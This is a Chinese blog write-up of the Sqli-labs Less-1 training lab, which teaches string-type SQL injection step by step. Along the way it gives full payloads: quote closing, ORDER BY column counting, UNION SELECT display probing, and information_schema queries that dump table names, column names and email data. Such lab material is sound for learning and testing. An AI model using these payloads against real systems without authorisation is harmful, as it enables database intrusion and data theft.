sql注入系列Sqli-labs(less-1)

最新推荐文章于 2024-05-03 16:47:55 发布

m0d1fy

最新推荐文章于 2024-05-03 16:47:55 发布

阅读量2.2k

点赞数

分类专栏： web安全 Sql注入文章标签： web安全 sql

本文链接：https://blog.csdn.net/BetsyMyGirl/article/details/121635395

版权

SQL注入字符型注入 ORDER BY UNION 数据库查询

关键词由CSDN通过智能技术生成

web安全同时被 2 个专栏收录

7 篇文章 0 订阅

订阅专栏

Sql注入

6 篇文章 0 订阅

订阅专栏

判断注入点

http://192.168.81.210/sqli/Less-1/?id=1’输入单引号出现报错，从报错语句中可以猜测后端代码为

select user from users where id='1' limit 0,1

当输入了一个单引号语句就变成了

select user from users where id='1'' limit 0,1

因为正常的情况下，用户只能将搜索的参数传入到数据库里面进行查询，是不可能去修改查询语句的，上方的报错就是由于用户修改了查询的语句而引起的，将以上语句代入到自己的数据库里执行也是会报错的，因为多了一个单引号。

判断注入类型

输入1 and 1=1和 1 and 1=2发现页面无变化，可以猜测不是数字型注入，为什么？

and 逻辑与

当条件表达式两边都为真才是真，有一边为假则是假
从下方图中可以发现，当and有一边为假的时候，是没有返回内容的回到题目，我们输入上方字符串的时候，传入到数据库执行的语句就变成了

select user from users where id='1 and 1=1' limit 0,1

select user from users where id='1 and 1=2' limit 0,1

被当成了一个整体查询。从下方图中的4条语句对比可以发现，当语句是字符型查询（第三条、第四条）的时候，会忽略后面的字符串。所以由此可以判断注入类型是字符型注入。
既然是字符型的注入，就需要加上一个单引号或者双引号去闭合前面的引号，那么加在哪里呢？
回到我们前面猜测的查询语句，它是

select user from users where id='1' limit 0,1

所以我们需要把引号加在参数值后面，把它变成与前面的引号成为一对

select user from users where id='1'' limit 0,1

闭合了之后就可以在添加的引号后面插入sql语句了，由于后面还有一个单个的引号，所以还需要把它闭合或者注释掉。

判断查询列数

ORDER BY 语句用于根据指定的列对结果集进行排序。

当order by的数字大于当前的列数时候就会报错,sql注入利用这个特性来判断列数

输入1' order by 4--+和1' order by 3--+发现等于3的时候正常，等于4的时候报错，由此可以知道一共有三列。可以使用二分法进行判断，即第一次可以是order by 1，第二次可以是order by 10。如果都是正常的则在10的基础上x2；如果不正常则在10的基础上/2也就是order by 5，如果5正常6不正常，则列数为6列。

--+ 注释符

把select a from b where id='1' order by 4--+' limit 0,1中的' limit 0,1给注释掉

确定显示位

什么是显示位？在一个网站的正常页面，服务端执行SQL语句查询数据库中的数据，客户端将数据展示在页面中，这个展示数据的位置就叫显示位。

从上一步知道一共有三列，下面就需要知道哪些列是可以显示数据的，这里可以使用union操作符

UNION 操作符用于合并两个或多个 SELECT 语句的结果集,UNION 结果集中的列名总是等于 UNION 中第一个 SELECT 语句中的列名，并且UNION 内部的 SELECT 语句必须拥有相同数量的列。列也必须拥有相似的数据类型。同时，每条 SELECT 语句中的列的顺序必须相同。

这里虽然查询的123都可以查询到，但是回到程序里查询1' union select 1,2,3--+可以发现并没有查询到123，这里的123实际上就是前面的order by 3这是因为程序在展示数据的时候通常只会取结果集的第一行数据，所以，只要让第一行查询的结果是空集，即union左边的select子句查询结果为空，那么union右边的查询结果自然就成为了第一行，打印在网页上了从上图可以发现，查询的123只有23显示，所以想要查询数据就需要将想要查询的内容填充到2,3里

获取数据

查询当前数据库select database();问题来了，在sql注入中如何查询当前的数据库名呢？只需把database()填充到2或3里-1' union select 1,2,database()--+就可以查询到数据库名了。
获取到数据库后就可以查询它的表名，如对以下内容不理解，可以先看以下这篇文章

information_schema数据库

可以发现查询到了emails数据表，但是一个数据库里肯定不止个数据表，可以发现security这个数据库里除了emails表之外，还有referers，uagents，users表，如何将这几行数据一起获取呢？这里需要用到group_concat()函数

将多行合并成一行

获取当前数据库全部数据表-1' union select 1,2,(select group_concat(table_name)) from information_schema.tables where table_schema='security'--+这里的security数据库名、表名等的字符串表示，需要用单引号、双引号包裹住，或者可以使用对应的的十六进制的形式。获取某个数据表的所有列名-1' union select 1,2,(group_concat(column_name)) from information_schema.columns where table_name='emails'--+知道了列名就可以获取数据了-1' union select 1,2,(select group_concat(id,email_id)) from emails--+

m0d1fy

关注

0
点赞
踩
2

收藏

觉得还不错? 一键收藏
0
评论
sql注入系列Sqli-labs(less-1)

判断注入点http://192.168.81.210/sqli/Less-1/?id=1’输入单引号出现报错，从报错语句中可以猜测后端代码为select user from users where id='1' limit 0,1当输入了一个单引号语句就变成了select user from users where id='1'' limit 0,1因为正常的情况下，用户只能将搜索的参数传入到数据库里面进行查询，是不可能去修改查询语句的，上方的报错就是由于用户修改了查询的语句而引起的，将以上语
复制链接

扫一扫